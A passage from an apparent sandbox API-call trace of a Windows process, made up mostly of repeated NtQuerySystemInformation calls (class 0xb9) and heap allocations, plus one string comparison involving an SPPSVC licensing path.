(SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x50, ResultLength=0x0) [0207.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x50, ResultLength=0x0) [0207.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x38, ResultLength=0x0) [0207.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd280, Length=0x28, ResultLength=0x0) [0207.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd280, Length=0x28, ResultLength=0x0) [0207.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd280, Length=0x28, ResultLength=0x0) [0207.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x38, ResultLength=0x0) [0207.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd370, Length=0x28, ResultLength=0x0) [0207.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd370, Length=0x28, ResultLength=0x0) [0207.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x38, ResultLength=0x0) [0207.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0207.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x20, ResultLength=0x0) [0207.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x20, ResultLength=0x0) [0207.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x20, ResultLength=0x0) [0207.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x38, ResultLength=0x0) [0207.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0207.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd260, Length=0x20, ResultLength=0x0) [0207.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd260, Length=0x20, ResultLength=0x0) [0207.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x50, ResultLength=0x0) [0207.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x28, ResultLength=0x0) [0207.209] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0207.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x50, ResultLength=0x0) [0207.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x50, ResultLength=0x0) [0207.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x50, ResultLength=0x0) [0207.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x38, ResultLength=0x0) [0207.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd280, Length=0x28, ResultLength=0x0) [0207.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd280, Length=0x28, ResultLength=0x0) [0207.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd280, Length=0x28, ResultLength=0x0) [0207.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x38, ResultLength=0x0) [0207.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd370, Length=0x28, ResultLength=0x0) [0207.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd370, Length=0x28, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x38, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x20, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x20, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x20, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x38, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0207.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd260, Length=0x20, ResultLength=0x0) [0207.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd260, Length=0x20, ResultLength=0x0) [0207.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x50, ResultLength=0x0) [0207.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x50, ResultLength=0x0) [0207.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x50, ResultLength=0x0) [0207.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7d0, Length=0x50, ResultLength=0x0) [0207.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7d0, Length=0x50, ResultLength=0x0) [0207.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7d0, Length=0x50, ResultLength=0x0) [0207.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7d0, Length=0x50, ResultLength=0x0) [0207.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x38, ResultLength=0x0) [0207.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd530, Length=0x28, ResultLength=0x0) [0207.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd530, Length=0x28, ResultLength=0x0) [0207.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd530, Length=0x28, ResultLength=0x0) [0207.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd530, Length=0x28, ResultLength=0x0) [0207.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x28, ResultLength=0x0) [0207.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x38, ResultLength=0x0) [0207.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd620, Length=0x28, ResultLength=0x0) [0207.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd620, Length=0x28, ResultLength=0x0) [0207.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x20, ResultLength=0x0) [0207.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd440, Length=0x20, ResultLength=0x0) [0207.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd440, Length=0x20, ResultLength=0x0) [0207.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd440, Length=0x20, ResultLength=0x0) [0207.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x38, ResultLength=0x0) [0207.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x38, ResultLength=0x0) [0207.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd580, Length=0x20, ResultLength=0x0) [0207.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x20, ResultLength=0x0) [0207.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x20, ResultLength=0x0) [0207.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.237] GetProcessHeap () returned 0x2026c630000 [0207.237] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63dca0 [0207.237] GetProcessHeap () returned 0x2026c630000 [0207.237] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d717f00 [0207.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.238] GetProcessHeap () returned 0x2026c630000 [0207.238] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d6db480 [0207.238] GetProcessHeap () returned 0x2026c630000 [0207.238] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d652790 [0207.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.238] GetProcessHeap () returned 0x2026c630000 [0207.238] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63d8e0 [0207.239] GetProcessHeap () returned 0x2026c630000 [0207.239] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d717920 [0207.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x50, ResultLength=0x0) [0207.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.241] GetProcessHeap () returned 0x2026c630000 [0207.241] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63c440 [0207.241] GetProcessHeap () returned 0x2026c630000 [0207.241] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d718040 [0207.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.242] GetProcessHeap () returned 0x2026c630000 [0207.242] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d6dcd40 [0207.242] GetProcessHeap () returned 0x2026c630000 [0207.242] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d652370 [0207.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.242] GetProcessHeap () returned 0x2026c630000 [0207.242] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63d8e0 [0207.242] GetProcessHeap () returned 0x2026c630000 [0207.242] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d718280 [0207.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x50, ResultLength=0x0) [0207.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.246] GetProcessHeap () returned 0x2026c630000 [0207.246] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63c710 [0207.246] GetProcessHeap () returned 0x2026c630000 [0207.246] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d718180 [0207.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.247] GetProcessHeap () returned 0x2026c630000 [0207.247] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d6db900 [0207.247] GetProcessHeap () returned 0x2026c630000 [0207.247] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d652940 [0207.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.247] GetProcessHeap () returned 0x2026c630000 [0207.247] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63d8e0 [0207.247] GetProcessHeap () returned 0x2026c630000 [0207.247] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d718c80 [0207.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.247] NtQuerySystemInformation 